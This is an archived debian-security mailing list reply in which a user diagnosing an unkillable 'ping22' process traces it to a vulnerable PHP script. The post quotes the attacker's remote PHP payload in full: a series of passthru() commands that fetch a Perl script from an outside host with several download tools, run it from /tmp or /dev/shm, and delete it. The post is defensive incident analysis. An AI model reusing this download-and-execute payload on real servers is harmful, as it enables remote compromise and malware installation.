Re: ping22: can not kill this process

To: "Luis Mondesi" <lemsx1@gmail.com>
Cc: "Jan Luehr" <jan@stephan.homeunix.net>, debian-security@lists.debian.org
Subject: Re: ping22: can not kill this process
From: "Mike Wang" <comritesecurity@gmail.com>
Date: Thu, 3 Jan 2008 18:18:31 -0500
Message-id: <[🔎] 91dd90da0801031518o767a5937je92550695aa66f4f@mail.gmail.com>
In-reply-to: <[🔎] 91dd90da0801011846k7e01050du33f6589f27403ef2@mail.gmail.com>
References: <91dd90da0712301159s3f629c4bsc288aa96a810295d@mail.gmail.com> <E1J99PE-0000a1-00@calista.eckenfels.net> <91dd90da0712301828n6cbea16eq38909526270d2757@mail.gmail.com> <200712311403.53794.jan@stephan.homeunix.net> <[🔎] 91dd90da0801011610u15d93179n27c9bedfd31e62e0@mail.gmail.com> <[🔎] c1a7b3c90801011721y75b45107r92a5f39adb22b43b@mail.gmail.com> <[🔎] 91dd90da0801011846k7e01050du33f6589f27403ef2@mail.gmail.com>

Hi folks
       I found the issue, it is one of the php script allowing the remote script to run.
       and the remote script is something like:

<?php

 passthru('cd /tmp;wget 
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;curl -o bb.txt http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f 
bb.txt*');

 passthru('cd /tmp;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;lynx -source 
http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;fetch http://www.radiovirtual.org/bb.txt
 > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /tmp;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;curl -o bb.txt 
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt
;rm -f bb.txt*');

 passthru('cd /dev/shm;lynx -source http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;fetch 
http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
 > bb.txt;perl bb.txt;rm -f bb.txt*');

 passthru('id');

?>

        the /tmp was mounted as rw,noexec,nosuid, so it cannot run.

        but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run from there.



        what kind applications are using /dev/shm? I googled around,seem not find much information. 
right now I mount i as rw,noexec,nosuid.

Best Regards

Mike

Reply to:

Follow-Ups:
- Re: ping22: can not kill this process
  - From: "Luis Mondesi" <lemsx1@gmail.com>
- Re: ping22: can not kill this process
  - From: Bernd Eckenfels <ecki@lina.inka.de>

References:
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>
- Re: ping22: can not kill this process
  - From: "Luis Mondesi" <lemsx1@gmail.com>
- Re: ping22: can not kill this process
  - From: "Mike Wang" <comritesecurity@gmail.com>

Prev by Date: Re: Are the patches from the recent DSAs incorporated into the current etch kernel?
Next by Date: Re: ping22: can not kill this process
Previous by thread: Re: ping22: can not kill this process
Next by thread: Re: ping22: can not kill this process
Index(es):
- Date
- Thread